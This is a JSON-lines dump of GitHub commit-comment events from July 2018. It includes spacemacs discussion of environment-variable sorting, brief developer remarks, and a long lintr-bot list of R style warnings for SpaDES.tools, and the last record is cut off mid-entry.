{"id":"7925716654","type":"CommitCommentEvent","actor":{"login":"syl20bnr"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29614077,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-05T21:43:05Z","updated_at":"2018-07-05T21:43:05Z","author_association":"OWNER","body":"Nice observation, I already had in mind to defer the sorting for the end and document the order precedence in the header. \n\n> Le 5 juill. 2018 à 11:38, Rory Kirchner <notifications@github.com> a écrit :\n> \n> It also might be nice to avoid sorting entries with duplicate keys; the sorting messes up the order they are applied if there are multiple instances they can get applied in the wrong order. Sorry for just comments and no code contribution.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-05T21:43:05Z"}
{"id":"7925718700","type":"CommitCommentEvent","actor":{"login":"AriDEV"},"repo":{"name":"ProjectSkyfire/SkyFire.548"},"payload":{"comment":{"id":29614081,"position":5,"line":93,"path":"dep/acelite/ace/OS_NS_dlfcn.inl","commit_id":"cabff442781e6219e8ab0fd2f276b430d95a8dfe","created_at":"2018-07-05T21:43:37Z","updated_at":"2018-07-05T21:43:37Z","author_association":"MEMBER","body":"pahaha fail :D"}},"created_at":"2018-07-05T21:43:37Z"}
{"id":"7925726196","type":"CommitCommentEvent","actor":{"login":"syl20bnr"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":29614097,"position":null,"line":null,"path":null,"commit_id":"7c9f612c4f4a1eda7c8a11194ff2bce21ca53ca0","created_at":"2018-07-05T21:45:27Z","updated_at":"2018-07-05T21:45:27Z","author_association":"OWNER","body":"Indeed we need to sort on key or find a hack to be able to sort line-wise.\n\n> Le 5 juill. 2018 à 15:04, Paolo G. Giarrusso <notifications@github.com> a écrit :\n> \n> @roryk Thanks for the mention, but grabbing your fortune entry is somewhat unavoidable with this approach, since it runs an interactive shell. The previous (and much more robust) approach was to use exec-path-from-shell to grab only explicitly requested environment variables, but had other downsides — the assumption here is that you must edit the output until it's actually good.\n> \n> Regarding sorting, I agree with your concern, but multiple entries can't be applied in the right order; this file will never contain sth. like PATH=$PATH:/foo/bar, just PATH=/path:/sequence, so one entry will override the other.\n> \n> Sorting is done to delete duplicates, but it could be done more carefully — using a stable sorting on the \"key\" part only would preserve the relative ordering of conflicting definitions. But that at most ensures the second shell always overrides the first — you still run into problems.\n> \n> See also #10906.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-05T21:45:27Z"}
{"id":"7925729537","type":"CommitCommentEvent","actor":{"login":"broeker"},"repo":{"name":"electriccitizen/lawhelp"},"payload":{"comment":{"id":29614100,"position":null,"line":null,"path":null,"commit_id":"f71e9e94245009a4372aece8062d7feaaae7be17","created_at":"2018-07-05T21:46:21Z","updated_at":"2018-07-05T21:46:21Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [lawhelp#pr-af-loonc](https://dashboard.pantheon.io/sites/9ec12d94-c804-44b7-968e-166a0b49fdc0#pr-af-loonc).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-af-loonc-lawhelp.pantheonsite.io/)"}},"created_at":"2018-07-05T21:46:21Z"}
{"id":"7925731238","type":"CommitCommentEvent","actor":{"login":"soumithx"},"repo":{"name":"soumithx/IdeaProjects"},"payload":{"comment":{"id":29614104,"position":null,"line":null,"path":null,"commit_id":"130bdbc456a0dd9f2e9788684956c7f8617d6d0f","created_at":"2018-07-05T21:46:48Z","updated_at":"2018-07-05T21:46:48Z","author_association":"OWNER","body":"i"}},"created_at":"2018-07-05T21:46:48Z"}
{"id":"7925731894","type":"CommitCommentEvent","actor":{"login":"soumithx"},"repo":{"name":"soumithx/IdeaProjects"},"payload":{"comment":{"id":29614106,"position":null,"line":null,"path":null,"commit_id":"130bdbc456a0dd9f2e9788684956c7f8617d6d0f","created_at":"2018-07-05T21:46:59Z","updated_at":"2018-07-05T21:46:59Z","author_association":"OWNER","body":"i"}},"created_at":"2018-07-05T21:46:59Z"}
{"id":"7925736294","type":"CommitCommentEvent","actor":{"login":"kanishka-azimi"},"repo":{"name":"databrary/databrary"},"payload":{"comment":{"id":29614119,"position":null,"line":null,"path":null,"commit_id":"b0b68c8fca072bbb717907f0118024513d83dd00","created_at":"2018-07-05T21:48:10Z","updated_at":"2018-07-05T21:48:10Z","author_association":"CONTRIBUTOR","body":"This was an accident, although it was covered by test before commit."}},"created_at":"2018-07-05T21:48:10Z"}
{"id":"7925739461","type":"CommitCommentEvent","actor":{"login":"lmichael107"},"repo":{"name":"opensciencegrid/user-school-2018"},"payload":{"comment":{"id":29614126,"position":null,"line":null,"path":null,"commit_id":"276016bf25b6019ab19d22b93d5491eb244e4b62","created_at":"2018-07-05T21:49:02Z","updated_at":"2018-07-05T21:49:02Z","author_association":"COLLABORATOR","body":"Thank you!"}},"created_at":"2018-07-05T21:49:02Z"}
{"id":"7925739988","type":"CommitCommentEvent","actor":{"login":"rez0n"},"repo":{"name":"PrestaShop/blocklayered"},"payload":{"comment":{"id":29614128,"position":null,"line":null,"path":null,"commit_id":"309f414acba94eb5e53fe9eac58df66eddf71f49","created_at":"2018-07-05T21:49:11Z","updated_at":"2018-07-05T21:49:11Z","author_association":"NONE","body":"Hello! This commit broke \"Show products from subcategories\"."}},"created_at":"2018-07-05T21:49:11Z"}
{"id":"7925744278","type":"CommitCommentEvent","actor":{"login":"gilmarbassangue"},"repo":{"name":"gilmarbassangue/trabalho_01"},"payload":{"comment":{"id":29614142,"position":null,"line":null,"path":null,"commit_id":"f44e06cfc8b5767c31086acec00a2d5d177ce52b","created_at":"2018-07-05T21:50:18Z","updated_at":"2018-07-05T21:50:18Z","author_association":"OWNER","body":"mm"}},"created_at":"2018-07-05T21:50:18Z"}
{"id":"7925746362","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"PredictiveEcology/SpaDES.tools"},"payload":{"comment":{"id":29614151,"position":null,"line":null,"path":null,"commit_id":"beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4","created_at":"2018-07-05T21:50:52Z","updated_at":"2018-07-05T21:50:52Z","author_association":"NONE","body":"[inst/examples/example_distanceFromEachPoint.R:37:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/inst/examples/example_distanceFromEachPoint.R#L37) *style:* **Commented code should be removed.**\n```r\n​#beginCluster(3) # can do parallel\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[inst/examples/example_distanceFromEachPoint.R:40:2:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/inst/examples/example_distanceFromEachPoint.R#L40) *style:* **Commented code should be removed.**\n```r\n​#endCluster() # if beginCluster was run\n ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:82:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L82) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( method != \"RMexp\") {\n        ^\n```\n[R/initialize.R:237:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  X <- c(jitter(sort(rbeta(nPoints, betaPar, betaPar) * (maxX - minX) + minX)),\n  ^\n```\n[R/initialize.R:239:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L239) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Y <- c(jitter(sort(rbeta(nPoints / 2, betaPar, betaPar) * (maxY - meanY) + meanY)),\n  ^\n```\n[R/initialize.R:243:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L243) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Sr1 <- Polygon(cbind(X + xAdd, Y + yAdd))\n  ^~~\n```\n[R/initialize.R:244:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L244) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  Srs1 <- Polygons(list(Sr1), \"s1\")\n  ^~~~\n```\n[R/initialize.R:341:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L341) *style:* **Commented code should be removed.**\n```r\n​# ### INCORPORATE RELEVANT PARTS OF THIS OLD INIT FUNCTION INTO INITCOORDS()\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:346:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L346) *style:* **Commented code should be removed.**\n```r\n​# #'                      (currently only \\code{RasterLayer} or\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:347:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L347) *style:* **Commented code should be removed.**\n```r\n​# #'                      \\code{SpatialPolygonsDataFrame}) accepted.\n  ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:357:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L357) *style:* **Commented code should be removed.**\n```r\n​#     ext <- extent(agentlocation)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:359:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L359) *style:* **Commented code should be removed.**\n```r\n​#       #            nonNAs <- !is.na(getvalue(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:360:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L360) *style:* **Commented code should be removed.**\n```r\n​#       nonNAs <- !is.na(getValues(probinit))\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:361:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L361) *style:* **Commented code should be removed.**\n```r\n​#       wh.nonNAs <- which(nonNAs)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:362:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L362) *style:* **Commented code should be removed.**\n```r\n​#       #            ProbInit.v <- cumsum(getvalue(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:363:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L363) *style:* **Commented code should be removed.**\n```r\n​#       ProbInit.v <- cumsum(getValues(probinit)[nonNAs])\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:365:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L365) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:366:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L366) *style:* **Commented code should be removed.**\n```r\n​#         fI <- findInterval(ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:367:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L367) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[fI]\n          ^~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:368:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L368) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(numagents,0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:369:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L369) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v)+1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:370:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L370) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:372:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L372) *style:* **Commented code should be removed.**\n```r\n​#         #                va <- getvalue(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:373:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L373) *style:* **Commented code should be removed.**\n```r\n​#         va <- getValues(probinit)[nonNAs]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:374:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L374) *style:* **Commented code should be removed.**\n```r\n​#         ran <- runif(length(va), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:375:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L375) *style:* **Commented code should be removed.**\n```r\n​#         fI2 <- wh.nonNAs[ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:377:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L377) *style:* **Commented code should be removed.**\n```r\n​#         last.ran <- runif(length(fI2), 0, 1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:378:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L378) *style:* **Commented code should be removed.**\n```r\n​#         last.fI <- findInterval(last.ran, ProbInit.v) + 1\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:379:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L379) *style:* **Commented code should be removed.**\n```r\n​#         last.fI2 <- wh.nonNAs[last.fI]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:381:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L381) *style:* **Commented code should be removed.**\n```r\n​#         #                last.ran <- runif(length(fI2),0,1)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:382:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L382) *style:* **Commented code should be removed.**\n```r\n​#         #                last.fI2 <- wh.nonNAs[last.ran<va]\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:385:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L385) *style:* **Commented code should be removed.**\n```r\n​#         position <- xyFromCell(agentlocation,fI2,spatial = TRUE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:387:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L387) *style:* **Commented code should be removed.**\n```r\n​#         position <- coordinates(agentlocation)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:389:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L389) *style:* **Commented code should be removed.**\n```r\n​#         stop(\"need raster layer or Spatial Points object\")\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:391:9:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L391) *style:* **Commented code should be removed.**\n```r\n​#       numagents <- length(position)\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:399:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L399) *style:* **Commented code should be removed.**\n```r\n​#           colnames(xy) = c(\"x\", \"y\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:400:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L400) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(xy)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:401:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L401) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(sampleRandom(agentlocation, numagents, xy = TRUE, sp = TRUE))\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:403:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L403) *style:* **Commented code should be removed.**\n```r\n​#           sam <- sample(1:length(agentlocation),numagents)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:404:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L404) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation[sam,])\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:406:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L406) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:413:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L413) *style:* **Commented code should be removed.**\n```r\n​#           position <- SpatialPoints(agentlocation)\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:415:13:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L415) *style:* **Commented code should be removed.**\n```r\n​#           stop(\"need raster layer or Spatial Points object\")\n            ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:417:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L417) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:425:11:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L425) *style:* **Commented code should be removed.**\n```r\n​#         numagents <- length(position)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:429:7:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L429) *style:* **Commented code should be removed.**\n```r\n​#     stop(\"Need to provide agentlocation, which can be a map layer\")\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:431:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L431) *style:* **Commented code should be removed.**\n```r\n​#   heading1 <- runif(numagents, 0, 360)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:432:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L432) *style:* **Commented code should be removed.**\n```r\n​#   distance <- runif(numagents, 0.1, 10)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:434:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L434) *style:* **Commented code should be removed.**\n```r\n​#   .Object@ID <- as.character(1:numagents)\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:435:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L435) *style:* **Commented code should be removed.**\n```r\n​#   .Object@spatial <- position\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:436:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L436) *style:* **Commented code should be removed.**\n```r\n​#   .Object@heading <- heading1\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:437:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L437) *style:* **Commented code should be removed.**\n```r\n​#   .Object@distance <- distance\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/initialize.R:439:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/initialize.R#L439) *style:* **Commented code should be removed.**\n```r\n​#   return(.Object)\n    ^~~~~~~~~~~~~~~\n```\n[R/mapReduce.R:53:3:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/mapReduce.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  BsumVec <- reduced[fullRasterVals] # join\n  ^~~~~~~\n```\n[R/neighbourhood.R:112:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L112) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​adj.raw <- function(x = NULL, cells, directions = 8, sort = FALSE, pairs = TRUE,\n^~~~~~~\n```\n[R/neighbourhood.R:114:21:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                    ^~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:114:45:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L114) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                    match.adjacent = FALSE, cutoff.for.data.table = 2e3,\n                                            ^~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:233:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L233) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:238:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L238) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((adj[, \"from\"] %% numCol + adj[, \"to\"] %% numCol) == 1)) # | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:297:1:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L297) *style:* **Lines should not be more than 100 characters.**\n```r\n​              ((from %% numCol + to %% numCol) == 1))# | #right & left edge cells, with neighbours wrapped\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/neighbourhood.R:813:29:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L813) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​setGeneric(\"wrap\", function(X, bounds, withHeading) {\n                            ^\n```\n[R/neighbourhood.R:822:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L822) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:839:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L839) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:849:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L849) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) {\n                        ^\n```\n[R/neighbourhood.R:850:5:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L850) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    X <- wrap(X, bounds = extent(bounds))\n    ^\n```\n[R/neighbourhood.R:859:25:](https://github.com/PredictiveEcology/SpaDES.tools/blob/beb2cfbe393e1f93ac9fe86ccba83e2a69e2bac4/R/neighbourhood.R#L859) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  definition = function(X, bounds) 